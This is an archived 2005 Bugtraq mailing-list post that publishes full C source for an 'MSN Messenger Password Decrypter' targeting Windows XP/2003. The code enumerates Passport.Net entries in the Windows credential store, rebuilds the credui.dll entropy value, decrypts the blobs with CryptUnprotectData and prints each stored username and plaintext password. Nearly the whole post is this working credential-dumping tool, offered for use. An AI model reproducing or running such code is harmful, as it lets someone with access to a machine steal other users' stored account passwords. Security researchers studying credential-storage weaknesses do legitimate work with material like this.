MSN Messenger Password Decrypter for WinXP/2003

• Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200508-09 ] bluez-utils: Bluetooth device name validation vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 17 Aug 2005 19:27:47 +0100 (BST)
To: bugtraq@securityfocus.com

MSN Messenger uses Windows Credential UI [credui.dll]
on WinXP/2003. Password-Storage mechanism differs in
these OSes so, the code posted by tombkeeper
[http://xfocus.net/articles/200408/726.html] doesn't
seem to work anymore on my OS atleast. Also, a
'entropy' value has been thrown, which is based on
credui.dll GUID.

So, here is the code that fullfils the same purpose -
but surely works on my OS [WinXP SP2] :)

/--- Start-Code --/

/*
 * MSN Messenger Password Decrypter for Windows XP &
2003
 * (Compiled-VC++ 7.0, tested on WinXP SP2, MSN
Messenger 7.0)
 * - Gregory R. Panakkal
 * http://www.crapware.tk/
 * http://www.infogreg.com/
 */

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#pragma comment(lib, "Crypt32.lib")

//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK /
LCC-Win32 Includes]

typedef struct _CREDENTIAL_ATTRIBUTEA {
    LPSTR Keyword;
    DWORD Flags;
    DWORD ValueSize;
    LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
    DWORD Flags;
    DWORD Type;
    LPSTR TargetName;
    LPSTR Comment;
    FILETIME LastWritten;
    DWORD CredentialBlobSize;
    LPBYTE CredentialBlob;
    DWORD Persist;
    DWORD AttributeCount;
    PCREDENTIAL_ATTRIBUTEA Attributes;
    LPSTR TargetAlias;
    LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;

////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR,
DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD,
DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;

////////////////////////////////////////////////////////////////////

void showBanner()
{
    printf("MSN Messenger Password Decrypter for
Windows XP/2003\n");
    printf(" - Gregory R. Panakkal,
http://www.infogreg.com \n\n");
}

////////////////////////////////////////////////////////////////////
int main()
{
    PCREDENTIAL *CredentialCollection = NULL;
    DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

    //used for filling up blobEntropy
    char szEntropyStringSeed[37] =
"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
    short int EntropyData[37];
    short int tmp;

    HMODULE hDLL;
    DWORD Count, i;

    showBanner();

    //Locate CredEnumerate, CredRead, CredFree from
advapi32.dll
    if( hDLL = LoadLibrary("advapi32.dll") )
    {
        pfCredEnumerateA =
(typeCredEnumerateA)GetProcAddress(hDLL,
"CredEnumerateA");
        pfCredReadA =
(typeCredReadA)GetProcAddress(hDLL, "CredReadA");
        pfCredFree =
(typeCredFree)GetProcAddress(hDLL, "CredFree");

        if( pfCredEnumerateA == NULL||
            pfCredReadA == NULL ||
            pfCredFree == NULL )
        {
            printf("error!\n");
            return -1;
        }
    }
    

    //Get an array of 'credential', satisfying the
filter
    pfCredEnumerateA("Passport.Net\\*", 0, &Count,
&CredentialCollection);

    if( Count ) //usually this value is only 1
    {

        //Calculate Entropy Data
        for(i=0; i<37; i++) //
strlen(szEntropyStringSeed) = 37
        {
            tmp = (short int)szEntropyStringSeed[i];
            tmp <<= 2;
            EntropyData[i] = tmp;
        }

        for(i=0; i<Count; i++)
        {
            blobEntropy.pbData = (BYTE *)&EntropyData;
            blobEntropy.cbData = 74;
//sizeof(EntropyData)

            blobCrypt.pbData =
CredentialCollection[i]->CredentialBlob;
            blobCrypt.cbData =
CredentialCollection[i]->CredentialBlobSize;

            CryptUnprotectData(&blobCrypt, NULL,
&blobEntropy, NULL, NULL, 1, &blobPlainText);
            
            printf("Username : %s\n",
CredentialCollection[i]->UserName);
            printf("Password : %ls\n\n",
blobPlainText.pbData);
        }
    }

    pfCredFree(CredentialCollection);
}

/--- End-Code --/

URL :
http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html

rgds,
Gregory R. Panakkal

        
                
____________________________________________________
Send a rakhi to your brother, buy gifts and win attractive prizes. Log on to http://in.promos.yahoo.com/rakhi/index.html

• Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200508-09 ] bluez-utils: Bluetooth device name validation vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [TOOL] Windows XP/2003 MSN Password Decrypter ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... typedef struct _CREDENTIAL_ATTRIBUTEA { ... DWORD ValueSize; ... typedef CREDENTIALA CREDENTIAL; ... (Securiteam) Re: how to get process id for a connection under w2k environment ... USHORT CreatorBackTraceIndex; ... typedef struct _IO_STATUS_BLOCK { ... DWORD Status; ... PHANDLEINFO pHandleInfo; ... (microsoft.public.win32.programmer.networks) Re: BYTE and DWORD ... >> David - thanks for your help. ... >> initial startup problem. ... >> typedef DWORD ... > Is a DWORD signed or unsigned? ... (comp.sys.mac.programmer.help) Re: Win 98 vxd fulle path ... typedef unsigned short WCHAR; ... DWORD dwX; ... typedef struct _HANDLE_TABLE_ENTRY ... (microsoft.public.development.device.drivers) Re: oe 6 and msn messenger ... >> Every time I start oe6 msn messenger starts with it. ... > PreventRun ... DWord value called Hide Messenger and set the value to 2. ... (microsoft.public.windows.inetexplorer.ie6_outlookexpress)